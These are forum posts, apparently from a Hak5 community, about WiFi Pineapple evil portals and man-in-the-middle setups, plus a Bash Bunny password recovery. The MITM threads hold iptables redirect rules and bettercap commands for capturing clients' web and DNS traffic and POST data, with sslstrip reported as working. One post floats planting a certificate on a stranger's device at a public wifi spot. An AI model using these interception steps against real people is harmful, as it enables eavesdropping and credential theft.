[Landing Page / Evil Portal - Capture data]

On 3/2/2016 at 11:49 AM, cyberbitz said:

Ok, Thanks MarcSThe1st. I will hold off on using that. I have created a startup script to enable the landing page which works. However, getting it to work is tricky at times. I don't have much time today to look into it and I am not a pineapple expert so I am learning while digging into the code.

What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

So I got everything working, But still having the same issue --> What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

Anybody come up with a fix for this ??

[My Impressions and questions on Nano]

On 6/18/2017 at 2:13 AM, PoSHMagiC0de said:

Thanks for all the responses.  May have to look into the cooling idea.  I think I may use that extra nic for my raspberry pi as a low power solution as I figured out the bettercap thing.  The solution came from another solution to use Burp to capture the traffic from the pineapple.

http://hackedexistence.com/project/wifi-pineapple/wifi-pineapple-mk5-with-burp-proxy.html

Judging by the script, he must be using one of the tetras so ignore his changes.  The bottom part is what I did after I ran the wp6.sh script.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Cool thing about this is it doesn't break ICS.  I made a bash script in the same directory I keep the wp6 script and run it when I want to use Bettercap to mitm clients on the Nano.

Parameters i use with bettercap are:

bettercap -I eth1 --no-spoofing --no-discovery --gateway 192.168.1.1 --proxy -P POST

The gateway ip is the ip of the gateway I am sharing internet through.  eth1 is the interface the Nano is on.

I was shocked when I saw requests.  Even sslstripping was working.

 

I didn't know it was going to work but I tried it anyway and did start seeing DNS requests.

iptables -t nat -A PREROUTING -p tcp --destination-port 53 -j REDIRECT --to-port 5300

Of course you can redirect 443 to bettercap's https listening port but unless you have its cert on the victim, they will get cert warnings as in any https proxying.  Possibility with this is to use some a BashBunny with some of its payloads to add your cert while they are not looking at a public place using a public wifi and get their MAC.  Then you can go back and target them with pineapple to try and get them to connect to you.

Awesome! Thanks so much for the reply on my thread. This is exactly what I was looking for.

[WiFi pineapple MITM with Kali]

Updated my question, sorry for the confusion.

On 4/25/2017 at 10:16 AM, esa said:

Can you elaborate why this setup is not ideal?  If it is not working, try using 192.168.1.2 as the destination ip. 

 

[WiFi pineapple MITM with Kali]

Hi everyone,

I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

So here's my setup, 

MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine

: Pardon my diagram skills :(

Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal since you would need to ssh into the pineapple to run this script every time. Ideally it would be best to do this via the web interface of the pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated.

 

#!/bin/bash

if [[ $# -eq 0 ]] ; then
    echo "Usage: $0 (enable|disable)"
    exit 1
fi

action="$1"
case $action in
    enable)
      echo "Enabling ..."
      iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
      iptables -t nat -A POSTROUTING -j MASQUERADE
    ;;
    disable)
      echo "Disabling ..."
      iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
      #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
    ;;
    *)
      echo "Usage: $0 (enable|disable)"
      exit 1
    ;;
esac

 

[Root password reset]

Also just noticed that performing a recovery does not delete or replace any of your storage scripts or files in the storage partitions. AWESOME !!!!

[Root password reset]

in the mean time just did a forced recovery.

 On 3/8/2017 at 4:42 AM, Darren Kitchen said:

Restore the Bash Bunny from the recovery partition:

1. Set the Bash Bunny switch to position 3 (arming mode)
2. Plug the Bash Bunny into a USB power source. The LED will momentarily light green. As soon as the LED goes off, unplug the Bash Bunny.
3. Repeat the previous step twice more (for a total of 3 times)
4. Plug the Bash Bunny into a USB power source and leave for 4 minutes. The LED will light RED to indicate recovery. When the light returns to BLUE blinking, the Bash Bunny has recovered.

 

 

[Root password reset]

Is there a way to reset the root password without logging in. 

 

[Where do I find Sample Scripts?]

Awesome can't wait :)

[Where do I find Sample Scripts?]

Nothing on bashbunny.com or the hak5 github repo.  so repo mentioned in the video is still MIA.